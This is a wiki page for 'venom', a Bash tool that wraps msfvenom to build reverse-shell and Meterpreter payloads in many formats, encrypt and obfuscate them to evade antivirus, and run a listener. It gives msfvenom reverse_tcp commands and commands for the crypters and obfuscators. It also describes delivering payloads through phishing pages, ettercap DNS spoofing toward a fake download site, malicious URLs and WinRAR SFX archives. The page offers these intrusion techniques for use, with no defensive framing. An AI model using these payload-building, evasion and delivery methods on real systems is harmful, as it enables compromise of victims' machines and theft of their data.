venom - shellcode generator Wiki
msfvenom shellcode generator/compiler/listenner
Brought to you by:
peterubuntu10
Menu
▾
▴
.
.
.
[ MAIN MENU ]
Home
venom - shellcode generator 1.0.12
Video not available
.
more video tutorials: | venom changelog: | git repository Install: | fix kali mingw32 install
.
.
.
| option | build | target | format | output |
|---|---|---|---|---|
| 1 | shellcode | unix | C | C |
| 2 | shellcode | windows | C | DLL |
| 3 | shellcode | windows | DLL | DLL |
| 4 | shellcode | windows | C | PYTHON/EXE |
| 5 | shellcode | windows | C | EXE |
| 6 | shellcode | windows | PSH-CMD | EXE |
| 7 | shellcode | windows | C | RUBY |
| 8 | shellcode | windows | MSIEXEC | MSI |
| 9 | shellcode | windows | POWERSHELL | BAT(b64) |
| 10 | shellcode | windows | HTA-PSH | HTA(b64) |
| 11 | shellcode | windows | PSH-CMD | PS1(b64) |
| 12 | shellcode | windows | PSH-CMD | BAT(b64) |
| 13 | shellcode | windows | VBS | VBS(shikata+ancii) |
| 14 | shellcode | windows | PSH-CMD | VBS |
| 15 | shellcode | windows | PSH-CMD/C | |
| 16 | shellcode | webserver | PHP | PHP(b64) |
| 17 | shellcode | multi OS | PYTHON | PYTHON(b64) |
| 18 | shellcode | multi OS | JAVA | JAR(rce) |
| 19 | web_delivery | multi OS | PYTHON/PSH | PYTHON/BAT(b64) |
| 20 | shellcode | android | DALVIK | APK |
.
.
VENOM 1.0.12 - metasploit Shellcode generator/compiler/listener
Author: peterubuntu10@sourceforge.net [ r00t-3xp10it ]
Suspicious-Shell-Activity (SSA) RedTeam develop @2016
HomePage: http://sourceforge.net/u/peterubuntu10/profile/
Codename: black mamba [ GPL licensed ]
.
.
.
[ DEPENDENCIES ]
Zenity | Metasploit | GCC (compiler) | Pyinstaller (compiler)
mingw32 (compiler) | pyherion.py (crypter) | wine (emulator)
PEScrambler.exe (PE obfuscator) | apache2 (webserver)| winrar
vbs-obfuscator (crypter) | encrypt_PolarSSL (crypter) and
ettercap MitM+DNS_Spoof (venom domain name attack vector)
Venom.sh will download/install all dependencies as they are needed
Adicionally as build shell/aux/setup.sh to help you install all venom
tool dependencies (metasploit as to be manually installed)
.
.
[ HOW DOES VENOM.SH WORKS ? ]
This script will use msfvenom (metasploit) to generate shellcode in
diferent formats ( c | python | ruby | dll | msi | hta | psh | vbs | php | java)
then injects the shellcode generated into one template previous writen
by me (example: python) "the python funtion will execute the shellcode
into RAM" also uses compilers like gcc (gnu cross compiler) or mingw32
or pyinstaller to build the stand-alone executable file, it also starts a
multi-handler to recive the remote connection (shell or meterpreter)
.
'venom generator' tool reproduces some of the technics used
by Veil-Evasion.py, unicorn.py, powersploit.py, etc, etc, etc..
"P.S. some payloads are undetectable by AV soluctions... yes!!!"
One of the reasons for that its the use of a funtion to execute
the 2º stage of shell/meterpreter directly into targets ram
the other reazon its the use of external obfuscators/crypters.
.
But venom its not a fork of any of this tools because its writen
using Bash contrary to those tools that uses Python, so i can not
copy any funtion writen from any of this tools and past it on my
bash script (obviously), also remmenbering that veil does not
build: [.msi .hta .vbs .ps1 .dll .php .jar ] payload formats...
.
Remmenber also that software like: pycrypto, pyinstaller, pywin
gcc, mingw32, hiperion, Py2exe, PEScrambler, was not written by
any of the veil developers, i just did the same that veil porting
this softwares to my project to be hable to compile obfuscate
or crypt the shellcode generated by msfvenom...
.
.
[ HOW DO I DELIVER MY PAYLOADS TO TARGET HOST ? ]
venom 1.0.11 (malicious_server) was build to take advantage of
apache2 webserver to deliver payloads (lan) using a fake webpage
writen in html that takes advantage of <iframe> <meta-http-equiv><br>
or tags to be hable to trigger payload download. Venom also<br>
gives you the ability to deliver your payloads in 2 diferent ways:<br>
.<br>
1º - run shell/aux/setup.sh to config venom domain name<br>
attack vector (http://mega-upload.com) thats going to use<br>
ettercap (mitm+dns_spoof method) to redirect target traffic<br>
to our phishing webpage (IPv<4/6> configuration required)<br>
.<br>
2º - use shell/aux/setup.sh to delete venom domain name<br>
attack vector and force venom.sh main tool to use default<br>
settings (http://<your-ip-adrr>) to deliver payloads using<br>
'social engeneering' technic (send malicious URL to target)<br>
.<br>
.<br>
<strong><a class="alink notfound" href="%20WHAT%20ARE%20THE%20FILES%20INSIDE%20TEMPLATES%20FOLDER%20%3F%20">[ WHAT ARE THE FILES INSIDE TEMPLATES FOLDER ? ]</a></strong><br>
The shellcode generated can not be executed by its own...<br>
It requires to be embedded into one template (example: batch)<br>
to be executed, So the files inside '/shell/templates' are<br>
templates previous writen by me using diferent languages like<br>
(C, batch, ruby, powershell, python, php, vbscript) to trigger<br>
the execution of shellcode directly into targets RAM.<br>
.<br>
.<br>
<strong><a class="alink notfound" href="%20WHAT%20ARE%20THE%20FILES%20TRIGGER.BAT%20FOR%20%3F%20">[ WHAT ARE THE FILES TRIGGER.BAT FOR ? ]</a></strong><br>
In some modules venom will build the payload and trigger.bat<br>
to 'trigger' the execution of payload when embedded into one<br>
winrar/SFX executable file "upon extraction". Venom gives you<br>
the ability to 'trigger' your payloads in 3 diferent ways:<br>
.<br>
1º - paste the command provided by venom into target cmd<br>
2º - copy bouth files (payload and trigger.bat) to target<br>
into the same directory and press twice in trigger.bat<br>
3º - compress bouth files into one WinRar/sfx file<br>
send it to target, and press twice to execute it.<br>
.<br>
.<br>
<strong><a class="alink notfound" href="%20BUILDING%20SHELLCODE%20USING%20MSFVENOM%20DOES%20NOT%20FLAG%20AV%20DETECTIONS%20%3F%20">[ BUILDING SHELLCODE USING MSFVENOM DOES NOT FLAG AV DETECTIONS ? ]</a></strong><br>
Let's take Veil-Evasion python payload (crypted) as example:<br>
1º - veil uses msfvenom to build shellcode in C format<br>
2º - then it embedded the shellcode source code into one template<br>
writen in pyhton language (the funtion will execute shellcode)<br>
3º - uses 'pyherion.py' to encrypt the source code with one random<br>
AES key + base64 (all together = FUD) "My 'python/exe -> pyherion'<br>
module reproduces the same technic, by using the same crypter ;)"<br>
.<br>
So it depends of the crypters/obfuscators used to scramble the<br>
sourcecode and also the ability to execute the 2º stage of shell<br>
or meterpreter stager directly into targets ram (not touching disk)<br>
Another example is maligno tool that deliver payloads under https<br>
(SSL/TLS encrypted comunications) evading better AV detections.<br>
'There are more technics, but they are not reproduced by venom'</p>
<p>.<br>
.<br>
<strong><a class="alink notfound" href="%20HOW%20DOES%20MSFVENOM%20ACTUALLY%20BUILDS%20SHELLCODE%20%3F%20">[ HOW DOES MSFVENOM ACTUALLY BUILDS SHELLCODE ? ]</a></strong><br>
The default way to generate a windows binary payload (.exe)<br>
using msfvenom is achieved through the -f switch (format) and -o (output name)</p>
<div class="codehilite"><pre><span></span><code><span class="n">msfvenom</span> <span class="o">-</span><span class="n">p</span> <span class="n">payload</span><span class="o">-</span><span class="n">name</span> <span class="n">LHOST</span><span class="o">=</span><span class="mf">127.0</span><span class="o">.</span><span class="mf">0.1</span> <span class="n">LPORT</span><span class="o">=</span><span class="mi">666</span> <span class="o">-</span><span class="n">f</span> <span class="n">exe</span> <span class="o">-</span><span class="n">o</span> <span class="n">payload</span><span class="o">.</span><span class="n">exe</span>
</code></pre></div>
<p>But msfvenom allow us to build shellcode in diferent formats<br>
like: asp, aspx, aspx-exe, dll, elf, exe, exe-small, hta-psh<br>
macho, osx-app, psh, vba, vba-exe, vba-psh, vbs, bash, c<br>
java, perl, powershell, python, ruby, sh, vbscript.<br>
The complete list can be accessed using the follow command:</p>
<div class="codehilite"><pre><span></span><code>sudo msfvenom --help-formats
</code></pre></div>
<p>now lets generate a simple shellcode to windows/shell/reverse_tcp<br>
chosing powershell as output format "note that we will not use<br>
the flag -o (Save the payload) option, this way the shellcode<br>
generated will only displays in current terminal windows". </p>
<div class="codehilite"><pre><span></span><code>Using powershell as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f powershell
Using java as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f java
Using hex as output format:
msfvenom -p windows/shell/reverse_tcp LHOST=127.0.0.1 LPORT=666 -f hex
</code></pre></div>
<p>.<br>
.<br>
.<br>
<strong><a class="alink notfound" href="%20WHY%20PYINSTALLER%20DOES%20NOT%20WORK%20UNDER%20MY%20DISTRO%20%3F%20">[ WHY PYINSTALLER DOES NOT WORK UNDER MY DISTRO ? ]</a></strong><br>
pyinstaller needs certain dependencies to be installed<br>
under wine, sutch as: python-2.6.6 and pywin32 to work.<br>
the problem is that the dependencies needed must be<br>
based into attackers machine arch and chiptech brand<br>
(x86 | x64 | AMD | INTEL), for manually install it<br>
just unpack 'shell/obfuscate/pyinstaller-2.0.tar.gz'<br>
and follow the instructions inside readme-pedr0.txt<br>
pyinstaller command used by this script:</p>
<div class="codehilite"><pre><span></span><code>su <user_name> -c 'pyinstaller --noconsole --onefile <spec_file>'
</code></pre></div>
<p>.<br>
.<br>
<strong><a class="alink notfound" href="%20HOW%20CAN%20I%20USE%20PESCRAMBLER.EXE%20%3F%20">[ HOW CAN I USE PESCRAMBLER.EXE ? ]</a></strong><br>
PEScrambler.exe is a windows binary executable file<br>
and like pyinstaller does not run under 'root user acc'<br>
if you wish to use it then open an terminal(normal user)<br>
and issue the follow command on it:</p>
<div class="codehilite"><pre><span></span><code>su <user_name> -c 'wine pescrambler.exe -i <Infile.exe> -o <outfile.exe>'
</code></pre></div>
<p>(pescrambler.exe does not compile payloads to .exe format<br>
it will take an executable.exe and obfuscate the sourcecode<br>
to better evade AV detection rate (not very effective now)<br>
.<br>
.<br>
.<br>
<strong><a class="alink notfound" href="%20DESCRIPTION%20OF%20NATIVE%20CRYPTERS/COMPILERS%20">[ DESCRIPTION OF NATIVE CRYPTERS/COMPILERS ]</a></strong><br>
pyherion.py = Python 'crypter' that builds an dynamic AES/base64<br>
encoded launcher (with a random key) that's decoded/decrypted<br>
in memory (RAM) and then executed, 'evading AV detection'.</p>
<div class="codehilite"><pre><span></span><code>python pyherion.py <file-to-crypt.py> <outfile.py>
</code></pre></div>
<p>PEScrambler.exe = crypter to obfuscate an existing .exe</p>
<div class="codehilite"><pre><span></span><code>su <user_name> -c 'wine pescrambler.exe -i <Infile.exe> -o <outfile.exe>'
</code></pre></div>
<p>pyinstaller.py = compile an existing python file into one .exe</p>
<div class="codehilite"><pre><span></span><code>su <user_name> -c 'pyinstaller --noconsole --onefile <file-to-be-compiled.py>'
</code></pre></div>
<p>gcc = gnu cross compiler to build unix executable files</p>
<div class="codehilite"><pre><span></span><code>gcc -fno-stack-protector -z execstack <template.c> -o <outfile>
</code></pre></div>
<p>mingw32 = cross compiler to build .exe executable files</p>
<div class="codehilite"><pre><span></span><code>i586-mingw32msvc-gcc <template.c> -o <outfile.exe> -mwindows
</code></pre></div>
<p>encrypt_solarSSL = encrypt your payloads in base64+AES ramdom key..</p>
<div class="codehilite"><pre><span></span><code> <span class="n">python</span> <span class="n">encrypt_payload_polar</span><span class="o">.</span><span class="n">py</span> <span class="o"><</span><span class="n">password</span> <span class="n">to</span> <span class="n">generate</span> <span class="n">AES</span><span class="o">></span> <span class="o"><</span><span class="n">infile</span><span class="o">></span>
</code></pre></div>
<p>vbs-obfuscator = encrypt your payload.vbs using ascii (only vbs payloads)</p>
<div class="codehilite"><pre><span></span><code> python vbs-obfuscator.py <inFile.vbs> <outFile.vbs>
</code></pre></div>
<p>.<br>
.<br>
.<br>
<center><strong><a class="alink notfound" href="%20SPECIAL%20THANKS/CREDITS%20TO%20">[ SPECIAL THANKS/CREDITS TO ]</a>:</strong></center></p>
<hr>
<p>HD Moore (metasploit father) | Nick Harbour (PEScrambler.exe)<br>
@harmj0y (pyherion) | @G0tmi1k <a class="user-mention" href="/u/chris/">@chris</a> truncker @harmj0y (ruby_stager)<br>
David Cortesi (pyinstaller) | astr0baby (reflective fud dll injection method)<br>
0entropy (powershell poc's) | Matthew Graeber (powershell poc's)<br>
alor&naga (ettercap) | Liviu (encrypt_polarSSL) | Chaitanya (debugging)<br>
Suriya Prakash (debugging/recording tutorials)| and offcourse me (r00t-3xp10it) ^_^</p>
<hr>
<p><center><br>
Copyright © 2016 - venom shellcode generator<br>
</center></p></iframe>
Discussion
Anonymous